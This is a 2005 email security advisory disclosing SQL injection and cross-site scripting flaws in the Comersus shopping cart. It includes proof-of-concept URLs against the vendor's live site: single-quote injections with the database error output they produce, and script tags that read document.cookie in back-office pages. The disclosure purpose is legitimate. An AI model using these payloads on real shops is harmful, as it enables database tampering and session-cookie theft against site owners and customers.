Comersus suffers from multiple SQL injection and cross site scripting flaws. Detailed exploitation provided.
89f868388a71db2a6fdff00ecf45c31ecece58bd6dc3b76f3807199f4d77ca1b
------=_NextPart_001_0011_01C58325.76D757E0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Dcrab 's Security Advisory
http://www.dbtech.org
Deadbolt Computer Technologies
******************************
SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU =
CAN SEND EMAILS TO DCRAB@HACKERSCENTER.COM
******************************
Get Dcrab's Services to audit your Web servers, scripts, networks, etc =
or even code them. Learn more at http://www.dbtech.org
Severity: High
Title: [Bday Release] Comersus shopping cart has multiple Sql injection =
and Cross Site Scripting vulnerabilities
Date: 8/07/2005
Vendor: Comersus
Vendor Website: http://www.comersus.com
Vendor Status: Contacted but no reply
Summary: There are, multiple sql injection and cross site scripting =
vulnerabilities in Comersus Shopping Cart
Proof of Concept Exploits:=20
www.comersus.com/comersus6/store/comersus_optAffiliateRegistrationExec.as=
p?name=3D1&email=3D'&Submit=3DJoin%20now%21
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in =
query expression 'idProduct=3D''.
/comersus6/includes/databaseFunctions.asp, line 39
http://www.comersus.com/comersus6/store/comersus_optReviewReadExec.asp?id=
Product=3D'&description=3DDr%252E%2BSolomon%2560s%2BVirex%2B6%252E0%2B%25=
28For%2BMacintosh%2529
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in =
query expression 'idProduct=3D''.
/comersus6/includes/databaseFunctions.asp, line 39
www.comersus.com/backofficetest/backOfficePlus/comersus_backoffice_listAs=
signedPricesToCustomer.asp?idCustomer=3D7&name=3D><script>alert(document.=
cookie);</script>
Cross Site Scripting
www.comersus.com/backofficetest/backOfficePlus/comersus_backoffice_messag=
e.asp?message=3D><script>alert(document.cookie);</script>
Cross Site Scripting
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah =
and at http://www.hackerscenter.com
Author:=20
These vulnerabilities have been found and released by Diabolic Crab, =
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =
contact me regarding these vulnerabilities. You can find me at, =
http://www.hackerscenter.com or http://www.dbtech.org/. Lookout for my =
soon to come out book on Secure coding with php.
-------------------------------------------------------------------------=
-------
Sincerely,=20
Diabolic Crab=20
------=_NextPart_001_0011_01C58325.76D757E0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2668" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR><A=20
href=3D"http://www.dbtech.org">http://www.dbtech.org</A><BR>Deadbolt =
Computer=20
Technologies</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial =
size=3D2>******************************<BR>SPECIAL BIRTHDAY=20
RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND EMAILS TO =
<A=20
href=3D"mailto:DCRAB@HACKERSCENTER.COM">DCRAB@HACKERSCENTER.COM</A><BR>**=
****************************</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Get Dcrab's Services to audit your Web =
servers,=20
scripts, networks, etc or even code them. Learn more at <A=20
href=3D"http://www.dbtech.org">http://www.dbtech.org</A></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: [Bday Release] =
Comersus=20
shopping cart has multiple Sql injection and Cross Site Scripting=20
vulnerabilities<BR>Date: 8/07/2005</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Vendor: Comersus<BR>Vendor Website: <A=20
href=3D"http://www.comersus.com">http://www.comersus.com</A><BR>Vendor =
Status:=20
Contacted but no reply<BR>Summary: There are, multiple sql injection and =
cross=20
site scripting vulnerabilities in Comersus Shopping Cart</FONT></DIV>
<DIV> </DIV><FONT face=3DArial size=3D2>
<DIV><BR>Proof of Concept Exploits: </DIV>
<DIV> </DIV>
<DIV><A=20
href=3D"http://www.comersus.com/comersus6/store/comersus_optAffiliateRegi=
strationExec.asp?name=3D1&email=3D'&Submit=3DJoin%20now%21">www.c=
omersus.com/comersus6/store/comersus_optAffiliateRegistrationExec.asp?nam=
e=3D1&email=3D'&Submit=3DJoin%20now%21</A><BR>SQL=20
INJECTION</DIV>
<DIV> </DIV>
<DIV>Microsoft OLE DB Provider for ODBC Drivers error '80040e14'</DIV>
<DIV> </DIV>
<DIV>[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in =
query=20
expression 'idProduct=3D''.</DIV>
<DIV> </DIV>
<DIV>/comersus6/includes/databaseFunctions.asp, line 39</DIV>
<DIV> </DIV>
<DIV><A=20
href=3D"http://www.comersus.com/comersus6/store/comersus_optReviewReadExe=
c.asp?idProduct=3D'&description=3DDr%252E%2BSolomon%2560s%2BVirex%2B6=
%252E0%2B%2528For%2BMacintosh%2529">http://www.comersus.com/comersus6/sto=
re/comersus_optReviewReadExec.asp?idProduct=3D'&description=3DDr%252E=
%2BSolomon%2560s%2BVirex%2B6%252E0%2B%2528For%2BMacintosh%2529</A><BR>SQL=
=20
INJECTION<BR>Microsoft OLE DB Provider for ODBC Drivers error =
'80040e14'</DIV>
<DIV> </DIV>
<DIV>[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in =
query=20
expression 'idProduct=3D''.</DIV>
<DIV> </DIV>
<DIV>/comersus6/includes/databaseFunctions.asp, line 39</DIV>
<DIV> </DIV>
<DIV><BR><A=20
href=3D"http://www.comersus.com/backofficetest/backOfficePlus/comersus_ba=
ckoffice_listAssignedPricesToCustomer.asp?idCustomer=3D7&name=3D><scr=
ipt>alert(document.cookie);</script">www.comersus.com/backofficetest/back=
OfficePlus/comersus_backoffice_listAssignedPricesToCustomer.asp?idCustome=
r=3D7&name=3D><script>alert(document.cookie);</script</A>=
><BR>Cross=20
Site Scripting</DIV>
<DIV> </DIV>
<DIV><A=20
href=3D"http://www.comersus.com/backofficetest/backOfficePlus/comersus_ba=
ckoffice_message.asp?message=3D><script>alert(document.cookie);</script">=
www.comersus.com/backofficetest/backOfficePlus/comersus_backoffice_messag=
e.asp?message=3D><script>alert(document.cookie);</script</A>&=
gt;<BR>Cross=20
Site Scripting</DIV>
<DIV> </DIV>
<DIV><BR>Keep your self updated, Rss feed at: <A=20
href=3D"http://digitalparadox.org/rss.ah">http://digitalparadox.org/rss.a=
h</A> and=20
at <A =
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A></D=
IV>
<DIV> </DIV>
<DIV>Author: <BR>These vulnerabilities have been found and released by =
Diabolic=20
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =
free to=20
contact me regarding these vulnerabilities. You can find me at, <A=20
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =
or <A=20
href=3D"http://www.dbtech.org/">http://www.dbtech.org/</A>. Lookout for =
my soon to=20
come out book on Secure coding with php.<BR></FONT></DIV>
<DIV>
<HR>
</DIV>
<DIV><BR>Sincerely, <BR>Diabolic Crab <BR><IMG=20
src=3D"http://digitalparadox.org/dc.gif" =
border=3D0><BR><BR></DIV></BODY></HTML>
------=_NextPart_001_0011_01C58325.76D757E0--